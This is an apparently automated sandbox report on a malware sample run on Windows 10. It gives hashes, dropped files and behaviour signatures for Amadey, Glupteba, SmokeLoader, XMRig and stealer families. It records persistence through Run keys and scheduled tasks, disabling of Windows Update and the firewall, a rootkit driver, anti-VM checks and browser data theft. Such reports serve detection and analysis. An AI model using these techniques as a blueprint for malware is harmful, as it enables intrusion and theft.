SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

memory/1980-355-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1560-356-0x0000000000AE0000-0x0000000000B00000-memory.dmp

memory/1980-357-0x000000002DA70000-0x000000002E295000-memory.dmp

memory/1980-358-0x000000002DA70000-0x000000002E295000-memory.dmp

memory/1608-359-0x0000000000400000-0x0000000000C25000-memory.dmp

memory/1804-360-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1980-361-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1560-363-0x0000000140000000-0x00000001407F4000-memory.dmp

C:\Windows\System32\drivers\Winmon.sys

MD5 69989105f151015c16a2f422f5722590
SHA1 3fd92c0224de69048fd8f7d06be85709f25d6573
SHA256 b1c321b5e495473a401bd6e6adfe1ec931f8247b1b2646b0e259bff011a0958c
SHA512 f74b8086c083fc90117248ef39a1a64467258740e358aaa6454f24b88af169d27290d0c0a46210746734f975eef320ba2e138b43cdba8c2329c23f140d0c1e71

memory/1608-365-0x0000000000400000-0x0000000000C25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

memory/1608-367-0x0000000000400000-0x0000000000C25000-memory.dmp

memory/1560-369-0x0000000140000000-0x00000001407F4000-memory.dmp

memory/1560-371-0x0000000140000000-0x00000001407F4000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-06-25 10:27

Reported

2023-06-25 10:30

Platform

win10v2004-20230621-en

Max time kernel

151s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

GCleaner

loader gcleaner

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\System32\reg.exe N/A

SmokeLoader

trojan backdoor smokeloader

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fileexe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Notepad\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Notepad\Chrome\updater.exe N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ugrceei N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ugrceei N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ugrceei N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2411 = "Marquesas Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2792 = "Novosibirsk Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2872 = "Magallanes Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1661 = "Bahia Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ugrceei N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
